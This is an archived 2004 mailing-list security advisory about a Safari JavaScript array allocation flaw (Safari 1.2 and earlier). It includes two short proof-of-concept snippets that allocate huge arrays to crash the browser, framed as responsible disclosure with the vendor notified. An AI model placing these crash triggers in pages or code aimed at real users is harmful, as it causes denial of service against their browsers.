<<< Date Index >>>     <<< Thread Index >>>

Safari javascript array overflow



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

http://www.insecure.ws/article.php?story=2004021918172533

A problem exists in the way Safari Javascript engine allocates Arrays.
For example, allocating a too big array and writing into it, will
segfault Safari. There is no known way to execute remote code with this
vulnerability as the date of this advisory.
Konqueror doesn't seems to be vulnerable.


- --

Adv: safari_0x03
Release Date: 06/04/04
Affected Products: Safari =< 1.2
Impact: Denial of Service, Possibly exploitation
Severity: Remote, medium.
Vendor: Notified (19/03/04)
Author: kang, kang@xxxxxxxxxxx


Simple allocation management error trigger:

~    var a = new Array(99999999999999999999999);
~    a[0+5]="AAAAA";


Another possibilty...;)

var bam = new Array(0x23000000);
bam.sort(new Function("return 1"));


There are some other possibilities :>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFASkVmxt5Ja4aWvZMRAtG7AKCOz+licSBi/NpYe4qNu4YX468mCACdF4LA
DOrzcVourknKaBqvWFAlaQI=
=VISk
-----END PGP SIGNATURE-----